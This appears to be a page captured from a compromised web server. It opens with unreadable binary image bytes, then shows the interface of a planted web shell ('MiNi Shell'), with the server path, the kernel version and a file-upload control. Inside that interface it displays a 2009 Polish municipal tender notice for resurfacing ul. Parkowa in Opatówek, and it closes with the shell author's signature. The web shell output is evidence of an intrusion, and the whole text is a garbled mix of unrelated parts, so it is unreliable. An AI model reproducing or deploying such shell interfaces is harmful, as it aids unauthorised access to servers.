JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090317/66266-N-2009.html

<p class="kh_header"><b>Opatówek: Przebudowa nawierzchni ul. Parkowej w Opatówku, gmina Opatówek o długości 440 mb</b><br>
<b>Numer ogłoszenia: 66266 - 2009; data zamieszczenia: 17.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Opatówek , ul. Plac  Wolności 14, 62-860 Opatówek, woj. wielkopolskie, tel. 062 7618080, 7618454,, faks 062 7618017.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opatowek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa nawierzchni ul. Parkowej w Opatówku, gmina Opatówek o długości 440 mb.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa nawierzchni ul. Parkowej w Opatówku.  Zakres robót obejmuje niżej wyszczególnione roboty budowlane podzielone na etapy :
ETAP I
1. Roboty pomiarowe - 0, 250 km
2.Regulacja istniejących krawężników - 150 m 
3.Krawężniki betonowe wystające w wym. 15 x 30 cm  - 30 m 
4.Wykopy liniowe pod rurociągi o śred. 10 cm - 7,2 m3
5.Wykopy oraz przekopy wykonywane koparkami podsiębiernymi 0, 15 m3 na odkład - wykop studzienki ściekowe - 3,47 m3 
6. Zasypanie wykopów liniowych pod przykanaliki - 7,2 m3
7. Przykanaliki z rur PVC o śr. 10 cm - 36 m 
8. Studzienki ściekowe uliczne betonowe o śr. 500 mm  - 3 kpl. 
9. Wykonanie cięcia piłą nawierzchni bitumicznej na gł. do 5 cm - 250 m
10. Mechaniczna rozbiórka nawierzchni bitumicznej o gr. 4 cm z wywozem - 50 m2 
11.Mechaniczne wykonanie i zagęszczenie warstwy odsączającej o gr. 10 cm - 50 m2
12.Ułożenie podbudowy z kruszywa łamanego ( gabro, melafir ) grubość warstwy po zagęszczeniu 15 cm - 50 m2
13. Podbudowa z mieszanki betonowej B - 75,  grubość warstwy 3 cm - 50 m2
14. Wykonanie ścieku ulicznego z kostki brukowej - 250 m
15. Wykonanie wcięcia w istniejącej nawierzchni bitumicznej piłą na gł. do 5 cm- 15 m
16. Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - asfaltową transport  na odległość 5 km -  67,5 t
17.Skropienie asfaltem nawierzchni drogowych - 1250 m2 
18. Wykonanie nawierzchni z mieszanek mineralno - asfaltowych grubość warstwy ścieralnej po zagęszczeniu 4 cm - 1250 m2
19. Ręczne formowanie poboczy z ziemi  - 10 m3
20.Obrabianie na czysto poboczy  - 250 m2 
ETAP II
1.Roboty pomiarowe - 0,090 km 
2.Wykopy liniowe pod rurociągi o śr. 10 cm w gruntach suchych - 10,4 m3
3.Wykopy oraz przekopy wykonane koparkami 0,15 m3  - wykop pod studzienki ściekowe - 3,47 m3
4.Zasypywanie wykopów liniowych pod przykanalik  - 10,4 m3
5.Krawężniki betonowe wystające o wym. 15 x 30 cm  - 180 m 
6.Przykanaliki z rur PVC o średnicy 10 cm - 52 m 
7.Wykonanie studzienek ściekowych ulicznych betonowych o śr. 500 mm  - 4 kpl
8.Cięcie piłą nawierzchni bitumicznych na gł. do 5 cm - 180 m
9.Mechaniczna rozbiórka nawierzchni bitumicznej o gr. 4 cm z wywozem materiału z rozbiórki - 36 m2
10.Wykonanie i zagęszczenie mechaniczne warstwy odsączającej o gr. 10 cm - 36 m2
11.Wykonanie warstwy podbudowy z kruszywa łamanego ( gabro, melafir ) grubość warstwy po zagęszczeniu 15 cm - 36 m3 
12.Wykonanie podbudowy z mieszanki betonowej B - 75,  grubość warstwy 3 cm - 36 m2
13.Wykonanie ścieków ulicznych z kostki brukowej betonowej  - 180 m
14.Profilowanie i zagęszczenie podłoża parkingu pod warstwy konstrukcyjne nawierzchni wykonywane mechanicznie - 990 m2
15.Wykonanie dolnej warstwy podbudowy z kruszywa łamanego ( gabro, melafir ) grubość warstwy po zagęszczeniu 15 cm - 1440 m2   
16.Wykonanie górnej warstwy podbudowy z kruszywa łamanego ( gabro, melafir ) grubość warstwy po zagęszczeniu 5 cm - 1440 m2
17.Skropienie asfaltem nawierzchni drogowych - 1440 m2     
18.Wykonanie nawierzchni z mieszanek mineralno - asfaltowych grubość warstwy ścieralnej po zagęszczeniu 4 cm - 1440 m2
19.Pionowe znaki drogowe o pow. ponad 0,3 m2 wraz ze słupkami - 3 szt. 
20.Oznakowanie poziome miejsc parkingowych farbą chlorokauczukową odblaskową malowanie mechaniczne - 40 m2
ETAP III
1.Roboty pomiarowe - 0,100 km 
2.Wykonanie ław oporowych pod koryto nawierzchni - 200 m 
3.Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni wykonane mechanicznie  - 450 m2
4.Wykonanie dolnej warstwy podbudowy z kruszywa naturalnego grubość warstwy po zagęszczeniu 10 cm - 450 m2
5.Wykonanie górnej warstwy podbudowy z kruszywa łamanego ( gabro, melafir ) grubość warstwy po zagęszczeniu 13 cm - 450 m2
6.Skropienie asfaltem nawierzchni drogowych - 450 m2
7.Wykonanie nawierzchni z mieszanek mineralno - asfaltowych grubość warstwy ścieralnej po zagęszczeniu 4 cm - 400 m2
9.Formowanie poboczy z gruntu  - 40 m3
10.Plantowanie poboczy  - 200 m2 
11.Pionowe znaki drogowe o pow. ponad 0,3 m2 wraz ze słupkami - 4 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie 2.000 zł. Słownie : dwa tysiące złotych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy mający prawo występowania 
w obrocie prawnym i spełniający niżej podane warunki:
1. Wykonawca składający ofertę nie może być wykluczony z postępowania na podstawie art. 24 ust.1 i 2 ustawy Prawo zamówień publicznych.
2. Wykonawca musi spełniać wymogi zawarte w art. 22 ust.1 ustawy Prawo zamówień publicznych.
3. Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel w celu
obsadzenia podanych niżej stanowisk: 
Stanowisko - kierownik budowy musi posiadać uprawnienia do prowadzenia robót 
w zakresie drogowych obiektów budowlanych oraz należeć do Izby Inżynierów 
Budownictwa.
4. Wykonawca musi udowodnić, że zrealizował w okresie ostatnich 5 lat /2005-2009/ 
co najmniej 2 zadania związane z budową lub przebudową dróg (wykonanie nawierzchni z masy mineralno - asfaltowej) o wartości nie mniejszej niż 150.000,00 zł. - każde zadanie, potwierdzone referencjami stwierdzającymi należyte ich wykonanie.
5. Wykonawca musi udowodnić, że jest ubezpieczony od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności gospodarczej.
6. Wykonawca musi spełniać wymogi zawarte w specyfikacji istotnych warunków  zamówienia. Sposób dokonania oceny spełnienia warunków wymaganych od  
Wykonawców oparty będzie na zasadzie (spełnia/nie spełnia), w oparciu o informacje zawarte w dokumentach, oświadczeniach dołączonych przez Wykonawców do oferty.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca dołączy do oferty następujące dokumenty poświadczające oraz informacje:
1. Aktualny dokument potwierdzający, że profil działalności Wykonawcy odpowiada
przedmiotowi zamówienia oraz,  że Wykonawca jest uprawniony do występowania 
w obrocie prawnym zgodnie z wymaganiami ustawowymi /np. wypis z rejestru
prowadzonego przez sąd lub wypis z ewidencji działalności gospodarczej/, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. Oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 oraz nie
podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych /załącznik nr 1 do formularza oferty/.
Zamawiający zastrzega sobie prawo żądania od Wykonawcy wyjaśnień treści złożonej
oferty, wglądu w dokumenty potwierdzające prawdziwość oświadczenia w tym:
- zaświadczenie z Urzędu Skarbowego o nie zaleganiu z podatkami lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych
płatności lub wstrzymanie w całości wykonania decyzji właściwego organu /wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert/,
- aktualne zaświadczenie z ZUS-u lub KRUS-u o nie zaleganiu z opłatami i składkami na ubezpieczenie zdrowotne i społeczne lub zaświadczeniem, że uzyskał przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu /wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert/,
- informację z Krajowego Rejestru Karnego albo równoważnego zaświadczenia
właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, lub informacji z Krajowego Rejestru karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku, gdy oferent jest osobą prawną, informacje powinny dotyczyć urzędujących członków władz. 
3. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej.
Jeżeli Wykonawca ma siedzibę lub miejsca zamieszkania poza terytorium
Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składa
dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę 
lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1/  nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2/  nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
3/  nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne
     lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub
     rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub
miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji 
z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
4. Dokument stwierdzający przygotowanie zawodowe w zakresie objętym zamówieniem oraz zaświadczenie o przynależności do Izby Inżynierów Budownictwa jako załącznik nr 2 do formularza oferty.
5. Dane o doświadczeniu Wykonawcy w zakresie realizacji zamówień związanych 
z budową lub przebudową dróg ( wykonanie nawierzchni z masy mineralno - asfaltowej) na formularzu stanowiącym załącznik nr 3 do formularza oferty wraz z referencjami poprzednich zamawiających. 
6. Dane dotyczące podwykonawców, zakres powierzonych im części zamówienia (jeśli
Wykonawca przewiduje wykorzystanie podwykonawców) na załączniku nr 4 do formularza oferty.       
7. Wypełniony formularz cenowy wraz z kosztorysem ofertowym stanowiącym załącznik nr 5 do formularza oferty.
8.  Zaparafowany projekt umowy jako załącznik nr 6.
9. Polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest 
ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
gospodarczej jako załącznik nr 7..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.opatowek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Opatówku, Plac Wolności 14, 62 - 860 Opatówek, pokój numer 7, w godz. 08:00 - 15:00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2009 godzina 09:45, miejsce: Urząd Gminy w Opatówku, Plac Wolności 14, 62 - 860 Opatówek, pokój numer 13, w godz. 08:00 - 15:00.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com